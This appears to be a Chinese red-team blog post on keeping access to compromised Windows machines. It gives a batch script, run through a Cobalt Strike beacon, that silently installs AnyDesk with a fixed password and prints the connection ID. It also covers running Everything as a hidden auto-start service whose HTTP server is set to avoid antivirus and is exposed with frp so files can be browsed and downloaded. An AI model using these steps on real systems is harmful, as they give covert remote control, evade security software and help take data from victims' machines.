05@深蓝实验华东天勇战队

Anydesk

前言：在进行内网渗透的时候，如果目标机器出网，但是有时候目标3389端口未开放 或 防火墙设置导致我们无法通过3389连上目标RDP进行远控。但是依然有很多第三方远程控制软件可以帮助我们，例如AnyDesk。

先修改bat文件里的目录名

@echo off
AnyDesk.exe --install "C:\Users\05\Videos\anydesk" --silent
echo licence_keyABC | "C:\Users\05\Videos\anydesk\AnyDesk.exe" --register-licence
echo anydesk!@# | "C:\Users\05\Videos\anydesk\AnyDesk.exe" --set-password
choice /t 10 /d y /n >nul
for /f "delims=" %%i in ('anydesk --get-id') do set CID=%%i
echo Connection ID Is: %CID%

上线cs后再把下面文件上传到目标机的目录上

最后cs里运行AnyDesk.bat即可

成功拿到连接id，本机直接连接就行了

EveryThing

前言：

早在几年前就有很多apt组织利用everything来进行文件查找等，前几年在T00ls上也有人发过相关的文章，事实上在实战中用到的地方还是很多，而且他还是个白进程，支持命令行。

配置

1.先在官网下载64位的便携版https://www.voidtools.com/Everything-1.4.1.1009.x64.zip
2.然后在自己电脑上打开everything,配置好下面相关配置。

取消显示托盘图标

注意:如果不取消该选项的话，会在右下角出现一个比较显眼的everything图标,增加暴露的风险

启用HTTP服务器

绑定的ip是127.0.0.1，这样的话相关杀毒软件就不会拦截，然后用frp把端口映射出来就完事了，账号密码可以根据自己的需求来设置

实现(UAC权限运行)

1.配置完相关设置后，在Everything的目录下会出现相关配置文件，如下图(我们只需要下面画圈的两个文件就可以了

2.将Everything主程序和配置文件丢到目标电脑上。

3.用命令行Everything.exe -install-client-service 给Everything安装一个自启服务，无感运行，杀软不拦截
安装服务得UAC权限

4.接下来服务就启动起来了,端口也打开了.

记得用frp把你设置的端口映射出来哦，Everything可在线看很多东西，也可直接下载，这不比cs啥的翻文件舒服？